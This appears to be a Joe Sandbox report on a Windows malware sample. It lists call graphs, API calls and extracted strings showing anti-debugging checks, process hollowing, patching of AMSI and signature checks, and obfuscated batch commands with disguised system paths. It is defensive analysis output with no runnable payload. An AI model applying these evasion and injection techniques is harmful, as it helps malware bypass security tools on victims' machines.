29763->29764 29765 27c8798 21 API calls 29764->29765 29767 27d8de6 29765->29767 29769 27b4798 11 API calls 29766->29769 29768 27c8798 21 API calls 29767->29768 29770 27d8dfa 29768->29770 29774 27da33d 29769->29774 29771 27c8798 21 API calls 29770->29771 29772 27d8e0e 29771->29772 29773 27c8798 21 API calls 29772->29773 29775 27d8e22 CloseHandle 29773->29775 29776 27c881c 22 API calls 29774->29776 29777 27b480c 11 API calls 29775->29777 29778 27da361 29776->29778 29780 27d8e4e 29777->29780 29779 27b480c 11 API calls 29778->29779 29781 27da382 29779->29781 29782 27b4798 11 API calls 29780->29782 29783 27b4798 11 API calls 29781->29783 29784 27d8e85 29782->29784 29786 27da3b9 29783->29786 29785 27c881c 22 API calls 29784->29785 29787 27d8ea9 29785->29787 29789 27c881c 22 API calls 29786->29789 29788 27b480c 11 API calls 29787->29788 29792 27d8eca 29788->29792 29790 27da3dd 29789->29790 29791 27b480c 11 API calls 29790->29791 29793 27da3fe 29791->29793 29794 27b4798 11 API calls 29792->29794 29795 27b4798 11 API calls 29793->29795 29796 27d8f01 29794->29796 29798 27da435 29795->29798 29797 27c881c 22 API calls 29796->29797 29797->29259 29799 27c881c 22 API calls 29798->29799 29800 27da459 29799->29800 29801 27b480c 11 API calls 29800->29801 29802 27da47a 29801->29802 29803 27b4798 11 API calls 29802->29803 29804 27da4b1 29803->29804 29805 27c881c 22 API calls 29804->29805 29806 27da4d5 29805->29806 29807 27c881c 22 API calls 29806->29807 29808 27da4e4 29807->29808 29809 27c881c 22 API calls 29808->29809 29810 27da4f3 29809->29810 29811 27c881c 22 API calls 29810->29811 29812 27da502 29811->29812 29813 27c881c 22 API calls 29812->29813 29814 27da511 29813->29814 29815 27c881c 22 API calls 29814->29815 29816 27da520 29815->29816 29817 27c881c 22 API calls 29816->29817 29818 27da52f 29817->29818 29819 27c881c 22 API calls 29818->29819 29820 27da53e 29819->29820 29821 27c881c 22 API calls 29820->29821 29822 27da54d 29821->29822 29823 27c881c 22 API calls 29822->29823 29824 
27da55c 29823->29824 29825 27c881c 22 API calls 29824->29825 29826 27da56b 29825->29826 29827 27c881c 22 API calls 29826->29827 29828 27da57a 29827->29828 29829 27c881c 22 API calls 29828->29829 29830 27da589 29829->29830 29831 27c881c 22 API calls 29830->29831 29832 27da598 29831->29832 29833 27c881c 22 API calls 29832->29833 29834 27da5a7 29833->29834 29835 27c881c 22 API calls 29834->29835 29836 27da5b6 29835->29836 29837 27b480c 11 API calls 29836->29837 29838 27da5d7 29837->29838 29839 27b4798 11 API calls 29838->29839 29840 27da60e 29839->29840 29841 27c881c 22 API calls 29840->29841 29842 27da632 29841->29842 29843 27c881c 22 API calls 29842->29843 29844 27da665 29843->29844 29845 27c881c 22 API calls 29844->29845 29846 27da698 29845->29846 29847 27c881c 22 API calls 29846->29847 29848 27da6cb 29847->29848 29849 27c881c 22 API calls 29848->29849 29850 27da6fe 29849->29850 29851 27c881c 22 API calls 29850->29851 29852 27da731 29851->29852 29853 27c881c 22 API calls 29852->29853 29854 27da764 29853->29854 29855 27c881c 22 API calls 29854->29855 29856 27da797 29855->29856 29857 27b480c 11 API calls 29856->29857 29858 27da7b8 29857->29858 29859 27b4798 11 API calls 29858->29859 29860 27da7ef 29859->29860 29861 27c881c 22 API calls 29860->29861 29862 27da813 29861->29862 29863 27b480c 11 API calls 29862->29863 29864 27da834 29863->29864 29865 27b4798 11 API calls 29864->29865 29866 27da86b 29865->29866 29867 27c881c 22 API calls 29866->29867 29868 27da88f 29867->29868 29869 27b480c 11 API calls 29868->29869 29870 27da8b0 29869->29870 29871 27b4798 11 API calls 29870->29871 29872 27da8e7 29871->29872 29873 27c881c 22 API calls 29872->29873 29874 27da90b 29873->29874 29875 27c881c 22 API calls 29874->29875 29876 27da93e 29875->29876 29877 27c881c 22 API calls 29876->29877 29878 27da971 29877->29878 29879 27c881c 22 API calls 29878->29879 29880 27da9a4 29879->29880 29881 27c881c 22 API calls 29880->29881 29882 27da9d7 29881->29882 29883 27c881c 22 API calls 
                                                                                                                                            APIs
                                                                                                                                            • InetIsOffline.URL(00000000,00000000,027DB3D5,?,?,?,000002F7,00000000,00000000), ref: 027CF0E2
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                              • Part of subcall function 027CEFC8: GetModuleHandleW.KERNEL32(KernelBase,?,027CF3CC,UacInitialize,0281237C,027DB40C,UacScan,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString), ref: 027CEFCE
                                                                                                                                              • Part of subcall function 027CEFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027CEFE0
                                                                                                                                              • Part of subcall function 027CF024: GetModuleHandleW.KERNEL32(KernelBase), ref: 027CF034
                                                                                                                                              • Part of subcall function 027CF024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027CF046
                                                                                                                                              • Part of subcall function 027CF024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027CF05D
                                                                                                                                              • Part of subcall function 027B7E10: GetFileAttributesA.KERNEL32(00000000,?,027CFD00,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,UacScan,0281237C,027DB40C,UacInitialize), ref: 027B7E1B
                                                                                                                                              • Part of subcall function 027BC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029068C8,?,027D0032,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession), ref: 027BC2FB
                                                                                                                                              • Part of subcall function 027CDFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE01F
                                                                                                                                              • Part of subcall function 027CDFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE04F
                                                                                                                                              • Part of subcall function 027CDFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027CE064
                                                                                                                                              • Part of subcall function 027CDFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027CE090
                                                                                                                                              • Part of subcall function 027CDFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027CE099
                                                                                                                                              • Part of subcall function 027B7E34: GetFileAttributesA.KERNEL32(00000000,?,027D2E7D,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,Initialize), ref: 027B7E3F
                                                                                                                                              • Part of subcall function 027B7FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,027D301B,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,Initialize,0281237C,027DB40C,ScanString,0281237C,027DB40C), ref: 027B7FD5
                                                                                                                                              • Part of subcall function 027CDF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDFD2), ref: 027CDF3F
                                                                                                                                              • Part of subcall function 027CDF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027CDF79
                                                                                                                                              • Part of subcall function 027CDF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027CDFA6
                                                                                                                                              • Part of subcall function 027CDF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027CDFAF
                                                                                                                                              • Part of subcall function 027C8798: LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                              • Part of subcall function 027C8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                              • Part of subcall function 027C8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                              • Part of subcall function 027C8704: LoadLibraryW.KERNEL32(amsi), ref: 027C870D
                                                                                                                                              • Part of subcall function 027C8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027C876C
                                                                                                                                            • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,027DB764), ref: 027D4DEB
                                                                                                                                              • Part of subcall function 027CDE78: RtlInitUnicodeString.NTDLL(?,?), ref: 027CDEA0
                                                                                                                                              • Part of subcall function 027CDE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDEF2), ref: 027CDEB6
                                                                                                                                              • Part of subcall function 027CDE78: NtDeleteFile.NTDLL(?), ref: 027CDED5
                                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 027D4FEB
                                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 027D5041
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                            • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$Virtua
lAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                              • Part of subcall function 027C85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027C8660
                                                                                                                                            • GetThreadContext.KERNEL32(000005DC,02812420,ScanString,028123A4,027CA774,UacInitialize,028123A4,027CA774,ScanBuffer,028123A4,027CA774,ScanBuffer,028123A4,027CA774,UacInitialize,028123A4), ref: 027C943A
                                                                                                                                              • Part of subcall function 027C824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C82BD
                                                                                                                                              • Part of subcall function 027C84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 027C8521
                                                                                                                                              • Part of subcall function 027C79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            • SetThreadContext.KERNEL32(000005DC,02812420,ScanBuffer,028123A4,027CA774,ScanString,028123A4,027CA774,Initialize,028123A4,027CA774,0000060C,002B9FF8,028124F8,00000004,028124FC), ref: 027CA14F
                                                                                                                                            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005DC,00000000,000005DC,02812420,ScanBuffer,028123A4,027CA774,ScanString,028123A4,027CA774,Initialize,028123A4,027CA774,0000060C,002B9FF8,028124F8), ref: 027CA15C
                                                                                                                                              • Part of subcall function 027C8798: LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                              • Part of subcall function 027C8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                              • Part of subcall function 027C8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                              • Part of subcall function 027C85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027C8660
                                                                                                                                            • GetThreadContext.KERNEL32(000005DC,02812420,ScanString,028123A4,027CA774,UacInitialize,028123A4,027CA774,ScanBuffer,028123A4,027CA774,ScanBuffer,028123A4,027CA774,UacInitialize,028123A4), ref: 027C943A
                                                                                                                                              • Part of subcall function 027C824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C82BD
                                                                                                                                              • Part of subcall function 027C84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 027C8521
                                                                                                                                              • Part of subcall function 027C79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 8710 27b5a78-27b5ab9 GetModuleFileNameA RegOpenKeyExA 8711 27b5afb-27b5b3e call 27b58b4 RegQueryValueExA 8710->8711 8712 27b5abb-27b5ad7 RegOpenKeyExA 8710->8712 8717 27b5b62-27b5b7c RegCloseKey 8711->8717 8718 27b5b40-27b5b5c RegQueryValueExA 8711->8718 8712->8711 8713 27b5ad9-27b5af5 RegOpenKeyExA 8712->8713 8713->8711 8715 27b5b84-27b5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8713->8715 8719 27b5bbb-27b5bbf 8715->8719 8720 27b5c9e-27b5ca5 8715->8720 8718->8717 8721 27b5b5e 8718->8721 8723 27b5bcb-27b5be1 lstrlenA 8719->8723 8724 27b5bc1-27b5bc5 8719->8724 8721->8717 8725 27b5be4-27b5be7 8723->8725 8724->8720 8724->8723 8726 27b5be9-27b5bf1 8725->8726 8727 27b5bf3-27b5bfb 8725->8727 8726->8727 8728 27b5be3 8726->8728 8727->8720 8729 27b5c01-27b5c06 8727->8729 8728->8725 8730 27b5c08-27b5c2e lstrcpynA LoadLibraryExA 8729->8730 8731 27b5c30-27b5c32 8729->8731 8730->8731 8731->8720 8732 27b5c34-27b5c38 8731->8732 8732->8720 8733 27b5c3a-27b5c6a lstrcpynA LoadLibraryExA 8732->8733 8733->8720 8734 27b5c6c-27b5c9c lstrcpynA LoadLibraryExA 8733->8734 8734->8720
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,027B0000,027DE790), ref: 027B5A94
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AB2
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AD0
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027B5AEE
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027B5B37
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,027B5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001), ref: 027B5B55
                                                                                                                                            • RegCloseKey.ADVAPI32(?,027B5B84,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027B5B77
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027B5B94
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027B5BA1
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027B5BA7
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027B5BD2
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C19
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C29
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C51
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C61
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027B5C87
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027B5C97
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                                            • Opcode ID: 81579fc8422512ed0493a974e25dd0c47a41a41ce7d0c9d1aa0b7274270c7e08
                                                                                                                                            • Instruction ID: bcd66b6a5d9681d14a1ba6cc7ac0a7b328d1f5d879edd603a14962e687a015f2
                                                                                                                                            • Opcode Fuzzy Hash: 81579fc8422512ed0493a974e25dd0c47a41a41ce7d0c9d1aa0b7274270c7e08
                                                                                                                                            • Instruction Fuzzy Hash: 2B5185B1E4020D7EFB27D6A4DC4AFEF7BBD9F04744F8001A1A604E6181EB749A448FA4

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 10677 27c8798-27c87bd LoadLibraryW 10678 27c87bf-27c87d7 GetProcAddress 10677->10678 10679 27c8807-27c880d 10677->10679 10680 27c87fc-27c8802 FreeLibrary 10678->10680 10681 27c87d9-27c87f8 call 27c7cf8 10678->10681 10680->10679 10681->10680 10684 27c87fa 10681->10684 10684->10680
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
